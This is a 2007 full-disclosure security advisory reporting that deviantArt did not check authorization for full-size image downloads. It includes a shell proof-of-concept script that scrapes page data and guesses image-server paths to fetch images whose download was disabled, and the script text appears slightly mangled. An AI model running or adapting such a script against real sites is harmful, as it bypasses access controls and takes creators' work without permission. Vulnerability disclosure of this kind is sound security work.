[Full-disclosure] deviantArt does not check authorization for image download

2007-06-27T00:00:00
ID SECURITYVULNS:DOC:17371
Type securityvulns
Reporter Securityvulns
Modified 2007-06-27T00:00:00

Description

Security Advisory

Title: deviantArt does not check authorization for image download Risk Rating: High Platforms: Any Author: Timothy Redaelli <tredaelli@inventati.org> Date: 27-06-2007

Overview

deviantArt does not apply any type of authorization checking for full-size image download.

Details

It is possibile to download the full-size (as uploaded) image also if the Download button is disabled.

Proof of Concept

!/bin/sh

Copyright (c) 2007 Timothy Redaelli <tredaelli@inventati.org>

URL=$1

download() { wget -U "" -nv "$@" }

parse() { wget -U "" http://www.deviantart.com/download/"$URL"/ && exit 0 URLS=$(wget -qU "" -O - http://www.deviantart.com/deviation/"$URL"/ | fgrep 'deviantART.pageData' | sed -e 's/^."fullview": {[^}]"\(http[^"]\).$/\1/' -e 's/\\//g' | awk -F / '{for (i = 0; i <= 0xF; i++) for (j = 0; j <= 0xF; j++) printf "http://69.28.181.52/%s/f/%s/%s/%x/%x/%s\n", $4, $6, $7, i, j, $10}') }

parse "$1"

echo "$URLS" | while read x; do download "$x" && exit 0 done

Timeline

Mar 26, 2007 -- Bug discovery. Mar 27, 2007 -- Contact deviantArt, no reply. Jun 26, 2007 -- Recontact deviantArt, still no reply. Jun 27, 2007 -- Bug published.

Credits

  • Timothy Redaelli <tredaelli@inventati.org>

-- Timothy Redaelli http://timothyredaelli.wordpress.com/